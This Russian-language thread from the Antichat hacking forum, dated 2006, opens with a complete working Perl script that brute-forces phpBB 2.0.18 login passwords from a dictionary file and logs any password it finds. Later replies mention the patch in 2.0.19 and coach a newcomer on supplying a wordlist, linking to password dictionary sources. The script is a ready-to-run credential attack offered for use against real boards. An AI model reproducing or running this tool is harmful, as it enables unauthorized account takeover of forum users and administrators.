ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу phpBB <= 2.0.18 Remote Dictionary Attack Tool
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

phpBB <= 2.0.18 Remote Dictionary Attack Tool
  #1  
Старый 26.01.2006, 16:55
Аватар для D1mOn
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию phpBB <= 2.0.18 Remote Dictionary Attack Tool
Код:
#!/usr/bin/perl
############################################
# Credits:                        Weakness and Xploit by DarkFig
# Affected products:     All PhpBB versions <= 2.0.18
# Type:                            Dictionnary attack
# Solutions:                    None official , but many solutions are possible ;)
# Note:                           If a line of the dictionnary file contain no data => "End of the password file"
# Ps:                                Public after 1week lol
#Demo:                            http://rapidshare.de/files/9574771/p...login.rar.html                         
# Team:                           Hackademie [] Acid_Root []  BoD []
# PS:                               Volcom joyeux anniversaire , bon oki je suis en retard...voila ton cadeau ^^
############################################
use IO::Socket;

#--------------Utilisation--------------#
if(@ARGV != 6){
print "
+---------------------------------------------------------------------------------+
+------------PhpBB <= 2.0.18 Passwd Dictionnary Attack [] by DarkFig--------------+
+---------------------------------------------------------------------------------+
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile>    +
+---------------------------------------------------------------------------------+
+ <host>        => The host where PhpBB is installed        |   [Ex: site.com]    +
+ <path>        => Path of the PhpBB board                  |   [Ex: /forum/]     +
+ <port>        => PhpBB board port                         |   [Default is 80]   +
+ <pass_file>   => File containing words (dictionnary file) |   [Ex: dico.txt]    +
+ <username>    => Username you want to bruteforce          |   [Ex: MasterLamer] +
+ <file_result> => File you want to log activity            |   [Ex: results.txt] +
+---------------------------------------------------------------------------------+
";exit();}

#--------------Data--------------#
$host       = $ARGV[0];
$path       = $ARGV[1];
$full       = "$host"."$path";
$port       = $ARGV[2];
$pass_file  = $ARGV[3];
$username   = $ARGV[4];
$fileresult = $ARGV[5];
$OK         = 0;
$referer    = "http://"."$host"."$path"."login.php?redirect=";
$postit     = "$path"."login.php";

#--------------Hello world-----------------#
print "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
       [+] Username             | $username
       [+] Dictionnary file     | $pass_file
       [+] Attack log           | $fileresult
+---------------------------------------------------------+";

#--------------Password file--------------#
open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n");
chomp(@passdico = <FILE>);
$nligne = "0";
while ($OK ne 1) {
$passwordz  = "$passdico[$nligne]";
$request    = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
$length     = length $request;
if ($passwordz eq ""){print "\n       [-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();}

#--------------Sending data--------------#
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed...";
print $send "POST $postit HTTP/1.1\n";
print $send "Host: $host\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: $length\n\n";
print $send "$request\n";
read $send, $answer, 15;
close($send);

#-------------Success---------------#
if ($answer =~ /HTTP\/(.*?) 302/) {
$OK = 1;
print "
       [-] Trying the password "."$passwordz
       [+] User:     $username
       [+] Password: $passwordz
+---------------------------------------------------------+\n";
open results, ">$fileresult";
print results "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
    [+] PhpBB board               | $full
   [+] Board's port              | $port
   [+] Username                  | $username
   [+] Dictionnary file          | $pass_file
    [+] Number of test            | $nligne
    [+] Password found            | $passwordz
+---------------------------------------------------------+\n";
close(FILE);close(results);exit();}

#-------------Failed-----------------#
if ($OK == 0) {print "\n       [-] Trying the password "."$passwordz";$nligne++;}}
 
Ответить с цитированием

  #2  
Старый 26.01.2006, 17:10
Аватар для syntacsis
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
Провел на форуме:
981128

Репутация: 43
По умолчанию
Это уже давнишний сплойт. http://forum.antichat.ru/thread11983.html
Именно из-за него, кстати, в версии 2.0.19 ограничили число попыток входа. Причем ограничили довольно прикольно. Если вы сделаете несколько попыток зайти на форум под ником админа и превысите разрешенное число попыток, а админ в это время будет он лайн, то его просто выбьет с форума. На то время, которое он сам указал в админке.
 
Ответить с цитированием

  #3  
Старый 27.01.2006, 13:32
Аватар для D1mOn
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию
ну хз я его увидел на http://h4cky0u.org, так что не вините за то что он давнишний)))
 
Ответить с цитированием

  #4  
Старый 27.01.2006, 18:37
Аватар для syntacsis
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
Провел на форуме:
981128

Репутация: 43
По умолчанию
Цитата:
Сообщение от D1mOn  
ну хз я его увидел на http://h4cky0u.org, так что не вините за то что он давнишний)))
Да все отлично! В русском ачате его не было.
Вот уже на 2.0.19 написали
http://forum.antichat.ru/thread13510.html
 
Ответить с цитированием

  #5  
Старый 31.01.2006, 19:40
Аватар для sergio_nikol
sergio_nikol
Новичок
Регистрация: 15.10.2005
Сообщений: 11
Провел на форуме:
30342

Репутация: 1
По умолчанию
Откудя взять библиотеки или строчку
+ <pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +
можно просто опустить(вплане написать любой txt файл)?
 
Ответить с цитированием

  #6  
Старый 31.01.2006, 19:54
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
Как это опустить? А как он брутить будет?
Это файл-словарь, который лежит в той-же дире, что и эксплойт. Нужно вписать его имя.

Куча словарей лежит тут.
http://www.insidepro.com/rus/download.shtml
http://www.passwords.ru/dic.php
http://neworder.box.sk/codebox.links.php?&key=passdict
http://acolytez.com/dict/
__________________
Full DNS report
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
NEW Exploits PhpBB <= 2.0.17 karapuz Форумы 3 18.01.2006 01:12
Kak lomati phpbb 2.0.18 i nizhe. Koroche na vseh forymah deistvyet. queen Уязвимости 26 05.01.2006 06:29
phpBB <= 2.0.18 exploit froZen* Форумы 5 22.12.2005 15:23
Код для XSS в phpbb 2.0.18 TTyck Форумы 2 27.11.2005 20:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ